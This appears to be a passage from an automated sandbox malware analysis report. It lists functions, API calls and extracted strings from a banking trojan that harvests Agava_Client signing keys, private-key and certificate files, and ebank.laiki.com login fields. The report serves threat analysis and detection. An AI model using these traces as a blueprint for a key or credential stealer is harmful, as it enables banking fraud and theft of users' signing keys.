                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                              • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                              • API String ID: 3942648141-1626032180
                                                                                                                                                                                                              • Opcode ID: ba5c5e775ba8123f51b772fd5700fd29ae7e8c9ba5eeb99e540a806ec55fea30
                                                                                                                                                                                                              • Instruction ID: 3291ed10e2b68cd623ae5bf72634718f100fccc916d18644b897703476905ead
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba5c5e775ba8123f51b772fd5700fd29ae7e8c9ba5eeb99e540a806ec55fea30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD103B1A142525FDB228F3C8C946B6FFE6EF46214F09426CEB95CB352E732D5098B50
                                                                                                                                                                                                              Function 01303570 Relevance: 49.3, APIs: 17, Strings: 11, Instructions: 276stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01304BF0: memset.MSVCRT(?,00000000,00000124,?,775B7390,?), ref: 01304C14
                                                                                                                                                                                                                • Part of subcall function 01304BF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,775B7390,?), ref: 01304C1F
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 01303596
                                                                                                                                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 013035B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013035C7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013035D8
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 01303620
                                                                                                                                                                                                              • strstr.MSVCRT(?,0132A8F4), ref: 01303634
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 01303674
                                                                                                                                                                                                              • strstr.MSVCRT(?,0132A908), ref: 01303682
                                                                                                                                                                                                              • strstr.MSVCRT(?,Agava_Client.ini), ref: 01303697
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01303734
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94), ref: 0130376D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID: .ini$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Mw$UseToken$keys.zip$keys_path.txt
                                                                                                                                                                                                              • API String ID: 2651364649-2496749083
                                                                                                                                                                                                              • Opcode ID: e1ac55156c8c04cc640493a5c0cfdfa5a035203e6b9f24b312b9d7624e5f0c37
                                                                                                                                                                                                              • Instruction ID: b03ee8880735f5637a1aad0f1ef9ab2ec109adfc91e5384ced5290be16f77462
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1ac55156c8c04cc640493a5c0cfdfa5a035203e6b9f24b312b9d7624e5f0c37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFA10930A0431E5FCB37DF289C69BEA7FE9BF45708F144198E945D7281EA719A48CB90
                                                                                                                                                                                                              Function 012FC240 Relevance: 47.6, APIs: 19, Strings: 8, Instructions: 362COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC261
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FC287
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FC2E8
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FC2F2
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FC2FA
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FC30B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FC312
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC326
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC3BD
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC3D4
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC452
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC469
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC4E6
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC4FD
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC578
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC58F
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC607
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC61E
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC6AB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$FileOperation$ErrorLastPath$#680BackslashCreateDirectoryFolderMakeSystem
                                                                                                                                                                                                              • String ID: 61C5C0CB$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                              • API String ID: 429570753-1642428849
                                                                                                                                                                                                              • Opcode ID: 1e9ddafcbf65d4f7857f6202ee491bdca8b5783d911239ac12f3be5abd922b67
                                                                                                                                                                                                              • Instruction ID: 528280663512ca5fbf252efa258fddace4413f1e3c5d6f06b72de2bc630a84b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e9ddafcbf65d4f7857f6202ee491bdca8b5783d911239ac12f3be5abd922b67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0E139B0C0425E9FCB62DFA8D854AEEBBF4EF49304F1085A9D649E7211E7349658CF90
                                                                                                                                                                                                              Function 012EAAF0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 267COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: P0Mw$open$taskmgr
                                                                                                                                                                                                              • API String ID: 0-2678412989
                                                                                                                                                                                                              • Opcode ID: 5da66f859d3cbac076e18927a0722cbf508779ecbff98de57573a15651c54710
                                                                                                                                                                                                              • Instruction ID: a9fecf05e47e7eebe8d88f0a63b8e6e668f9d9aef43d2a67bfa6f2c4e7b6c89a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5da66f859d3cbac076e18927a0722cbf508779ecbff98de57573a15651c54710
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B91B775610205EBD730EF68EC8CEEABBACEB59326F50415DFB05A7285C7719901CBA0
                                                                                                                                                                                                              Function 013020D0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 225fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 013020EE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487), ref: 0130212F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487), ref: 0130216B
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01302180
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130218A
                                                                                                                                                                                                              • #680.SHELL32 ref: 01302192
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013021A3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013021AA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 013021E2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 013021EF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487,?,?), ref: 01302237
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorFileLast$#680AttributesCreateDeleteDirectoryFolderMakeSystemmemset
                                                                                                                                                                                                              • String ID: 61c5c487$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 523324327-3869562356
                                                                                                                                                                                                              • Opcode ID: 79485fc2dd5a6b08bdfafe87945bd23211501b7c27ad25b1090167a984dc7ba5
                                                                                                                                                                                                              • Instruction ID: d98dac633a72ad326de46d954ef5a2a53ad0edaa4c3fe0f7b04d24075bddf88d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79485fc2dd5a6b08bdfafe87945bd23211501b7c27ad25b1090167a984dc7ba5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6871F2305003559BDB32AF789C6CBEB7BECBB49309F148198FA85D7285DA709648CB90
                                                                                                                                                                                                              Function 013001A0 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 013001BE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165), ref: 013001EB
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0130022D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01300233
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130023B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130024C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01300253
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165,?,?), ref: 013002C7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 01300305
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashCreateDirectoryErrorLast$#680FolderMakeSystemmemset
                                                                                                                                                                                                              • String ID: 61C5C165$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw$path.txt
                                                                                                                                                                                                              • API String ID: 3538034526-3859182591
                                                                                                                                                                                                              • Opcode ID: 7b0dc1ef27be99c2f75145910c2c9575a390a80cfe6c14f6c4a3afed01a3c5fc
                                                                                                                                                                                                              • Instruction ID: 83a9872614222e5596e9da8e5bb64d3db8eb3399757f8827623342a744490832
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b0dc1ef27be99c2f75145910c2c9575a390a80cfe6c14f6c4a3afed01a3c5fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F271F8315003159FDB379F789868BEB7BE8EF46389F148198F985DB281DB709A44CB90
                                                                                                                                                                                                              Function 01301A60 Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 185stringsynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,&txtSubId=,00000000,?), ref: 01301A83
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,&txtPin=), ref: 01301A92
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,ebank.laiki.com), ref: 01301AA1
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301ACD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301B03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 01301B6C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01301B76
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301B7E
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01301B8F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01301B96
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01301BA3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 01301BCD
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 01301BF2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,012F8A50), ref: 01301C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 01301C29
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 01301C33
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 01301C3E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01301C45
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01301C53
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301C64
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$#680CloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystem
                                                                                                                                                                                                              • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$P0Mw$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                              • API String ID: 4186562213-859513243
                                                                                                                                                                                                              • Opcode ID: e349a9f0380b04a639d304c964316b2738c0faa0f1d582a530a3dc0c5e9ad8cb
                                                                                                                                                                                                              • Instruction ID: 050ec304a9402a957f2135cd4a01d4d66094bcc79b6a951789de10bda3e62b7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e349a9f0380b04a639d304c964316b2738c0faa0f1d582a530a3dc0c5e9ad8cb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F551D7316002096BDB32AF789CA9AEF7BEDEF45749F04815CF946D7241EB70DA4487A0
                                                                                                                                                                                                              Function 012FF030 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 012FF05D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF09E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF0D2
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF0E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF0F1
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF0F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF10A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF111
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FF14B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FF158
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7,0132FDB8,0132FDB9), ref: 012FF199
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF1D4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF1DE
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF1E6
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF1F7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF1FE
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FF23B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FF248
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FF420,0132FDB8,00000000,00000000,?,?), ref: 012FF27E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF296
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF2A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorFileLast$BackslashCreate$#680AttributesDeleteDirectoryFolderHandleMakeSystem$CloseInformationThread
                                                                                                                                                                                                              • String ID: 61C5C1E7$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                              • API String ID: 2297442659-461251971
                                                                                                                                                                                                              • Opcode ID: b6d66b51401410ff96b216cc94017d35ed10e98a8ebd77650c9affe453f4a23a
                                                                                                                                                                                                              • Instruction ID: 4a875407de721d27e26dce4d6bb0fddea6c9c6509dcc2fad1a0c402558b960fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6d66b51401410ff96b216cc94017d35ed10e98a8ebd77650c9affe453f4a23a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4371F5366002165BDB31AF28D958BEABBE8AF46301F14819CFB85D7244DA70DA49CB90
                                                                                                                                                                                                              Function 012FF420 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 207filesynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF449
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF488
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF494
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF498
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4A7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF4AE
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF4E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF4E8
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF4EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4FB
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF502
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FF50C
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF5B9
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF633
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 012FF63E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14},00000006), ref: 012FF65B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FF662
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF674
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateFilePath$#680CopyDirectoryFolderHandleMakeMutexSystem$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                              • String ID: 61C5C1E7$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                              • API String ID: 3009083915-1123098298
                                                                                                                                                                                                              • Opcode ID: 4a145da173fe79ce482a89cb73f436bf6bb99602db93752b9b76348dc002de9f
                                                                                                                                                                                                              • Instruction ID: d3e17761dff9d8d581964c7de6b91be86482c55262a9ec9ae9df8967f8be1469
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a145da173fe79ce482a89cb73f436bf6bb99602db93752b9b76348dc002de9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE6125325143429FD7325F3CA928BA6BFD4AF4A704F5980ACEB89CB352DA70D405CB94
                                                                                                                                                                                                              Function 012FF427 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 205filesynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF449
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF488
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF494
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF498
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4A7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF4AE
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF4E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF4E8
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF4EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4FB
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF502
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FF50C
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF5B9
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF633
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 012FF63E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14},00000006), ref: 012FF65B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FF662
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF674
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateFilePath$#680CopyDirectoryFolderHandleMakeMutexSystem$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                              • String ID: 61C5C1E7$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                              • API String ID: 3009083915-1123098298
                                                                                                                                                                                                              • Opcode ID: 2b4ef6e83ed3c8eb3a9a66456d022271692efbbb73ddc2432dcf5e9130aa8914
